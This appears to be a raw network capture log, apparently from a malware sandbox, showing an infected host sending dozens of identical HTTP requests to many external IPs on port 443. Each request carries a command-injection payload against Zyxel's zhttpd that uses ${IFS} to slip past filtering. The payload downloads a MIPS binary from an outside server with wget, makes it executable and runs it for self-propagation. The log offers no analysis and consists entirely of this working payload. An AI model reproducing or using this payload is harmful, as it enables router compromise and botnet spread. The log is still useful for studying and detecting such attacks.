                                              Jan 29, 2024 07:03:37.769556999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1346192.168.2.1454112163.203.2.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769608974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1347192.168.2.1443516156.220.152.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769634008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1348192.168.2.146074246.96.120.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769661903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1349192.168.2.144215690.95.186.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769727945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1350192.168.2.1453440103.11.203.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769771099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1351192.168.2.1460500207.78.147.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769799948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1352192.168.2.1442834103.99.78.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769844055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1353192.168.2.144057042.158.96.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769860983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1354192.168.2.1455428223.208.163.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769885063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1355192.168.2.1454008210.58.201.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769931078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1356192.168.2.1433322195.222.241.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769990921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1357192.168.2.1457702124.10.168.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770028114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1358192.168.2.1453474172.133.20.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770051956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1359192.168.2.1435228195.203.0.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770096064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1360192.168.2.1441184129.226.49.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770126104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1361192.168.2.1453436165.241.164.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770164967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1362192.168.2.1457740125.156.186.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770221949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1363192.168.2.1444218122.89.214.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770275116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1364192.168.2.145500899.115.52.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770308018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1365192.168.2.143531062.96.0.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770338058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1366192.168.2.1455984126.119.199.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770370007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1367192.168.2.1448224159.107.150.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770401955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1368192.168.2.1440730199.90.85.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770432949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1369192.168.2.144920074.91.101.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770483971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1370192.168.2.144337447.126.153.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770515919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1371192.168.2.1441422193.107.106.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770543098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1372192.168.2.145673018.94.196.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770589113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1373192.168.2.1440560184.175.226.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770622969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1374192.168.2.1455788218.12.200.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770679951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1375192.168.2.1441094198.205.40.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770709991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1376192.168.2.1436826205.2.166.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770768881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1377192.168.2.145390071.29.191.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770798922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1378192.168.2.145657686.162.52.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770843983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1379192.168.2.143832067.47.189.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770869017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1380192.168.2.1459914195.121.155.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770895004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1381192.168.2.1444770144.151.102.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770950079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1382192.168.2.143437225.252.169.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.770977020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1383192.168.2.1446158162.112.255.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771014929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1384192.168.2.14342301.237.99.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771032095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1385192.168.2.143791449.230.219.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771071911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1386192.168.2.1453950121.30.82.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771100044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1387192.168.2.1435512160.88.162.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771136999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1388192.168.2.1451650194.39.163.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771182060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1389192.168.2.1434572212.70.69.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771215916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1390192.168.2.1457360130.100.11.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771248102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1391192.168.2.145542641.9.202.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771290064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1392192.168.2.143359485.26.202.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771471024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1393192.168.2.1433194196.44.60.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771486044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1394192.168.2.1447750173.238.219.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771527052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1395192.168.2.1443912136.84.138.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771573067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1396192.168.2.1457490148.243.152.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771610022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1397192.168.2.1456586163.76.233.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771648884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1398192.168.2.143367632.49.193.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771676064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1399192.168.2.145446670.37.241.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771723986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1400192.168.2.1433616169.19.68.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771764994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1401192.168.2.1440344116.247.251.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771791935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1402192.168.2.1436348171.16.182.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771836996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1403192.168.2.145616218.223.128.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771874905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1404192.168.2.143936883.200.230.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771913052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1405192.168.2.1440338122.95.81.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771935940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1406192.168.2.1447664166.135.58.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.771975994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1407192.168.2.145117225.134.233.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772020102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1408192.168.2.1445892208.38.165.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772042990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1409192.168.2.1441102136.195.87.238443
                                              TimestampBytes transferredDirectionData
